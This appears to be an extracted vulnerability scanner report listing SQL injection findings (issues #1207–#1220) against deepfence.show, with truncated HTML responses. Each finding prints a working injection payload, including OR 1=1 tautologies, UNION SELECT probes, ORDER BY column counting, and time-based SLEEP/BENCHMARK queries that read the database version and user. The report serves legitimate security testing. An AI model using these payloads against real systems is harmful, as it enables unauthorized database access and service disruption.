Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1207\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1208\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1209\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin'/*ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1210\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1211Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1212\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1213\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1214\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1215\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1216\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1217\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1218\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1219Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1220\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 